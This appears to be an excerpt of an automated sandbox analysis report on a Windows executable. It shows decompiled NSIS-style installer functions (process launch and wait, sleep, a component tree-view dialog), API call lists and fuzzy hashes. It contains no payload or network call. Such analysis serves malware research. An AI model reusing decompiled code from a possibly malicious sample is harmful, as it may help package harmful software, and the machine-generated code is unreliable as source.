                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                            • Opcode ID: 8e5a2dc8e97f5121f547a3fd27cce723003b5da521db6208ede05c4cdcda2bab
                                                                                                                                                                                                                            • Instruction ID: 2d901b8192490572888a47ddd232fc987996ffb3fac81da3ba11f3f8a509879b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e5a2dc8e97f5121f547a3fd27cce723003b5da521db6208ede05c4cdcda2bab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A416C7691420AEBDB20DF74EA8DB6D3775EB4E318FA08436F914CB110E73895819BB1
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E00401FA4(void* __ecx) {
                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                            				_t19 = E00402DA6(_t15);
                                                                                                                                                                                                                            				E004056CA(0xffffffeb, _t7); // executed
                                                                                                                                                                                                                            				_t9 = E00405C4B(_t19); // executed
                                                                                                                                                                                                                            				_t20 = _t9;
                                                                                                                                                                                                                            				if(_t20 == _t15) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                                                                                                                                                                            						_t13 = E00406AE0(_t17, _t20);
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                                                                                                                                                                            							if(_t13 != _t15) {
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t20);
                                                                                                                                                                                                                            					CloseHandle();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                              • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                                                                                                                                                                              • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                                                                              • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                                                                                                                                              • Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32 ref: 00406B13
                                                                                                                                                                                                                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2972824698-0
                                                                                                                                                                                                                            • Opcode ID: 9323cc5f74d4279da3a242e1114ef666756815fe95b2cddcc704206b053689ed
                                                                                                                                                                                                                            • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9323cc5f74d4279da3a242e1114ef666756815fe95b2cddcc704206b053689ed
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004014D7(intOrPtr __edx) {
                                                                                                                                                                                                                            				long _t3;
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				intOrPtr _t10;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                            				_t3 = E00402D84(_t7);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                                                                                                                                                                                            				if(_t3 <= 1) {
                                                                                                                                                                                                                            					_t3 = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				Sleep(_t3); // executed
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                            • Opcode ID: b1c326c608d934edba5287c2ab9886205131f3591e80fc453df13221f151a9a0
                                                                                                                                                                                                                            • Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1c326c608d934edba5287c2ab9886205131f3591e80fc453df13221f151a9a0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                            			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                                                                            				struct HWND__* _v12;
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				signed char* _v32;
                                                                                                                                                                                                                            				int _v36;
                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                            				signed int* _v60;
                                                                                                                                                                                                                            				signed char* _v64;
                                                                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                                                                            				long _v72;
                                                                                                                                                                                                                            				void* _v76;
                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                            				void* _v88;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				signed int _t198;
                                                                                                                                                                                                                            				intOrPtr _t201;
                                                                                                                                                                                                                            				long _t207;
                                                                                                                                                                                                                            				signed int _t211;
                                                                                                                                                                                                                            				signed int _t222;
                                                                                                                                                                                                                            				void* _t225;
                                                                                                                                                                                                                            				void* _t226;
                                                                                                                                                                                                                            				int _t232;
                                                                                                                                                                                                                            				long _t237;
                                                                                                                                                                                                                            				long _t238;
                                                                                                                                                                                                                            				signed int _t239;
                                                                                                                                                                                                                            				signed int _t245;
                                                                                                                                                                                                                            				signed int _t247;
                                                                                                                                                                                                                            				signed char _t248;
                                                                                                                                                                                                                            				signed char _t254;
                                                                                                                                                                                                                            				void* _t258;
                                                                                                                                                                                                                            				void* _t260;
                                                                                                                                                                                                                            				signed char* _t278;
                                                                                                                                                                                                                            				signed char _t279;
                                                                                                                                                                                                                            				long _t284;
                                                                                                                                                                                                                            				struct HWND__* _t291;
                                                                                                                                                                                                                            				signed int* _t292;
                                                                                                                                                                                                                            				int _t293;
                                                                                                                                                                                                                            				long _t294;
                                                                                                                                                                                                                            				signed int _t295;
                                                                                                                                                                                                                            				void* _t297;
                                                                                                                                                                                                                            				long _t298;
                                                                                                                                                                                                                            				int _t299;
                                                                                                                                                                                                                            				signed int _t300;
                                                                                                                                                                                                                            				signed int _t303;
                                                                                                                                                                                                                            				signed int _t311;
                                                                                                                                                                                                                            				signed char* _t319;
                                                                                                                                                                                                                            				int _t324;
                                                                                                                                                                                                                            				void* _t326;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t291 = _a4;
                                                                                                                                                                                                                            				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                                                                                                                                                            				_v8 = GetDlgItem(_t291, 0x408);
                                                                                                                                                                                                                            				_t326 = SendMessageW;
                                                                                                                                                                                                                            				_v24 =  *0x42a288;
                                                                                                                                                                                                                            				_v28 =  *0x42a270 + 0x94;
                                                                                                                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                                                                                                                            					L23:
                                                                                                                                                                                                                            					if(_a8 != 0x405) {
                                                                                                                                                                                                                            						_t301 = _a16;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_a12 = 0;
                                                                                                                                                                                                                            						_t301 = 1;
                                                                                                                                                                                                                            						_a8 = 0x40f;
                                                                                                                                                                                                                            						_a16 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                                                                                                                            						_v16 = _t301;
                                                                                                                                                                                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                                                                                                                                                            							if(( *0x42a279 & 0x00000002) != 0) {
                                                                                                                                                                                                                            								L41:
                                                                                                                                                                                                                            								if(_v16 != 0) {
                                                                                                                                                                                                                            									_t237 = _v16;
                                                                                                                                                                                                                            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                                                                                                                                                            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t238 = _v16;
                                                                                                                                                                                                                            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                                                                                                                                                            										_t301 = _v24;
                                                                                                                                                                                                                            										_t239 =  *(_t238 + 0x5c);
                                                                                                                                                                                                                            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                                                                                                                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L48;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_a8 == 0x413) {
                                                                                                                                                                                                                            								L33:
                                                                                                                                                                                                                            								_t301 = 0 | _a8 != 0x00000413;
                                                                                                                                                                                                                            								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                                                                                                                                                                                            								_t295 = _t245;
                                                                                                                                                                                                                            								if(_t295 >= 0) {
                                                                                                                                                                                                                            									_t94 = _v24 + 8; // 0x8
                                                                                                                                                                                                                            									_t301 = _t245 * 0x818 + _t94;
                                                                                                                                                                                                                            									_t247 =  *_t301;
                                                                                                                                                                                                                            									if((_t247 & 0x00000010) == 0) {
                                                                                                                                                                                                                            										if((_t247 & 0x00000040) == 0) {
                                                                                                                                                                                                                            											_t248 = _t247 ^ 0x00000001;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_t254 = _t247 ^ 0x00000080;
                                                                                                                                                                                                                            											if(_t254 >= 0) {
                                                                                                                                                                                                                            												_t248 = _t254 & 0x000000fe;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												_t248 = _t254 | 0x00000001;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										 *_t301 = _t248;
                                                                                                                                                                                                                            										E0040117D(_t295);
                                                                                                                                                                                                                            										_a12 = _t295 + 1;
                                                                                                                                                                                                                            										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                                                                                                                                                                                            										_a8 = 0x40f;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L41;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t301 = _a16;
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                                                                                                                            								goto L41;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L33;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L48;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						L48:
                                                                                                                                                                                                                            						if(_a8 != 0x111) {
                                                                                                                                                                                                                            							L56:
                                                                                                                                                                                                                            							if(_a8 == 0x200) {
                                                                                                                                                                                                                            								SendMessageW(_v8, 0x200, 0, 0);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_a8 == 0x40b) {
                                                                                                                                                                                                                            								_t225 =  *0x42372c;
                                                                                                                                                                                                                            								if(_t225 != 0) {
                                                                                                                                                                                                                            									ImageList_Destroy(_t225);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t226 =  *0x423740;
                                                                                                                                                                                                                            								if(_t226 != 0) {
                                                                                                                                                                                                                            									GlobalFree(_t226);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								 *0x42372c = 0;
                                                                                                                                                                                                                            								 *0x423740 = 0;
                                                                                                                                                                                                                            								 *0x42a2c0 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_a8 != 0x40f) {
                                                                                                                                                                                                                            								L90:
                                                                                                                                                                                                                            								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                                                                                                                                                                                            									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                                                                                                                            									ShowWindow(_v8, _t324);
                                                                                                                                                                                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L93;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E004011EF(_t301, 0, 0);
                                                                                                                                                                                                                            								_t198 = _a12;
                                                                                                                                                                                                                            								if(_t198 != 0) {
                                                                                                                                                                                                                            									if(_t198 != 0xffffffff) {
                                                                                                                                                                                                                            										_t198 = _t198 - 1;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_push(_t198);
                                                                                                                                                                                                                            									_push(8);
                                                                                                                                                                                                                            									E00404FFF();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								if(_a16 == 0) {
                                                                                                                                                                                                                            									L75:
                                                                                                                                                                                                                            									E004011EF(_t301, 0, 0);
                                                                                                                                                                                                                            									_v36 =  *0x423740;
                                                                                                                                                                                                                            									_t201 =  *0x42a288;
                                                                                                                                                                                                                            									_v64 = 0xf030;
                                                                                                                                                                                                                            									_v24 = 0;
                                                                                                                                                                                                                            									if( *0x42a28c <= 0) {
                                                                                                                                                                                                                            										L86:
                                                                                                                                                                                                                            										if( *0x42a31e == 0x400) {
                                                                                                                                                                                                                            											InvalidateRect(_v8, 0, 1);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                                                                                                                                                                                            											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L90;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t292 = _t201 + 8;
                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                                                                                                                                                            										if(_t207 != 0) {
                                                                                                                                                                                                                            											_t303 =  *_t292;
                                                                                                                                                                                                                            											_v72 = _t207;
                                                                                                                                                                                                                            											_v76 = 8;
                                                                                                                                                                                                                            											if((_t303 & 0x00000001) != 0) {
                                                                                                                                                                                                                            												_v76 = 9;
                                                                                                                                                                                                                            												_v60 =  &(_t292[4]);
                                                                                                                                                                                                                            												_t292[0] = _t292[0] & 0x000000fe;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											if((_t303 & 0x00000040) == 0) {
                                                                                                                                                                                                                            												_t211 = (_t303 & 0x00000001) + 1;
                                                                                                                                                                                                                            												if((_t303 & 0x00000010) != 0) {
                                                                                                                                                                                                                            													_t211 = _t211 + 3;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												_t211 = 3;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                                                                                                                                                            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                                                                                                                                                            											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_v24 = _v24 + 1;
                                                                                                                                                                                                                            										_t292 =  &(_t292[0x206]);
                                                                                                                                                                                                                            									} while (_v24 <  *0x42a28c);
                                                                                                                                                                                                                            									goto L86;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t293 = E004012E2( *0x423740);
                                                                                                                                                                                                                            									E00401299(_t293);
                                                                                                                                                                                                                            									_t222 = 0;
                                                                                                                                                                                                                            									_t301 = 0;
                                                                                                                                                                                                                            									if(_t293 <= 0) {
                                                                                                                                                                                                                            										L74:
                                                                                                                                                                                                                            										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                                                                                                                                                            										_a16 = _t293;
                                                                                                                                                                                                                            										_a8 = 0x420;
                                                                                                                                                                                                                            										goto L75;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										goto L71;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                            										L71:
                                                                                                                                                                                                                            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                                                                                                                                                            											_t301 = _t301 + 1;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t222 = _t222 + 1;
                                                                                                                                                                                                                            									} while (_t222 < _t293);
                                                                                                                                                                                                                            									goto L74;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                                                                                                                            							goto L93;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                                                                                                                                                            							if(_t232 == 0xffffffff) {
                                                                                                                                                                                                                            								goto L93;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                                                                                                                                                            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                                                                                                                                                            								_t294 = 0x20;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E00401299(_t294);
                                                                                                                                                                                                                            							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                                                                                                                                                            							_a12 = _a12 | 0xffffffff;
                                                                                                                                                                                                                            							_a16 = 0;
                                                                                                                                                                                                                            							_a8 = 0x40f;
                                                                                                                                                                                                                            							goto L56;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v36 = 0;
                                                                                                                                                                                                                            					_v20 = 2;
                                                                                                                                                                                                                            					 *0x42a2c0 = _t291;
                                                                                                                                                                                                                            					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                                                                                                                                                                            					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                                                                                                                                                                                            					 *0x423734 =  *0x423734 | 0xffffffff;
                                                                                                                                                                                                                            					_t297 = _t258;
                                                                                                                                                                                                                            					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                                                                                                                                                                                            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                                                                                                                            					 *0x42372c = _t260;
                                                                                                                                                                                                                            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                                                                                                                                                            					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                                                                                                                                                                                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                                                                                                                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					DeleteObject(_t297);
                                                                                                                                                                                                                            					_t298 = 0;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                                                                                                                                                            							if(_t298 != 0x20) {
                                                                                                                                                                                                                            								_v20 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t298 = _t298 + 1;
                                                                                                                                                                                                                            					} while (_t298 < 0x21);
                                                                                                                                                                                                                            					_t299 = _a16;
                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                                                                                                                                                            					_push(0x15);
                                                                                                                                                                                                                            					E004045C4(_a4);
                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                                                                                                                                                            					_push(0x16);
                                                                                                                                                                                                                            					E004045C4(_a4);
                                                                                                                                                                                                                            					_t300 = 0;
                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                            					if( *0x42a28c <= 0) {
                                                                                                                                                                                                                            						L19:
                                                                                                                                                                                                                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t319 = _v24 + 8;
                                                                                                                                                                                                                            						_v32 = _t319;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_t278 =  &(_t319[0x10]);
                                                                                                                                                                                                                            							if( *_t278 != 0) {
                                                                                                                                                                                                                            								_v64 = _t278;
                                                                                                                                                                                                                            								_t279 =  *_t319;
                                                                                                                                                                                                                            								_v88 = _v16;
                                                                                                                                                                                                                            								_t311 = 0x20;
                                                                                                                                                                                                                            								_v84 = 0xffff0002;
                                                                                                                                                                                                                            								_v80 = 0xd;
                                                                                                                                                                                                                            								_v68 = _t311;
                                                                                                                                                                                                                            								_v44 = _t300;
                                                                                                                                                                                                                            								_v72 = _t279 & _t311;
                                                                                                                                                                                                                            								if((_t279 & 0x00000002) == 0) {
                                                                                                                                                                                                                            									if((_t279 & 0x00000004) == 0) {
                                                                                                                                                                                                                            										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_v80 = 0x4d;
                                                                                                                                                                                                                            									_v48 = 1;
                                                                                                                                                                                                                            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                                                                                                                                                            									_v36 = 1;
                                                                                                                                                                                                                            									 *( *0x423740 + _t300 * 4) = _t284;
                                                                                                                                                                                                                            									_v16 =  *( *0x423740 + _t300 * 4);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t300 = _t300 + 1;
                                                                                                                                                                                                                            							_t319 =  &(_v32[0x818]);
                                                                                                                                                                                                                            							_v32 = _t319;
                                                                                                                                                                                                                            						} while (_t300 <  *0x42a28c);
                                                                                                                                                                                                                            						if(_v36 != 0) {
                                                                                                                                                                                                                            							L20:
                                                                                                                                                                                                                            							if(_v20 != 0) {
                                                                                                                                                                                                                            								E004045F9(_v8);
                                                                                                                                                                                                                            								goto L23;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								ShowWindow(_v12, 5);
                                                                                                                                                                                                                            								E004045F9(_v12);
                                                                                                                                                                                                                            								L93:
                                                                                                                                                                                                                            								return E0040462B(_a8, _a12, _a16);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L19;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x004053bb
                                                                                                                                                                                                                            0x004053a2
                                                                                                                                                                                                                            0x004053ac
                                                                                                                                                                                                                            0x004053ac
                                                                                                                                                                                                                            0x004053a0
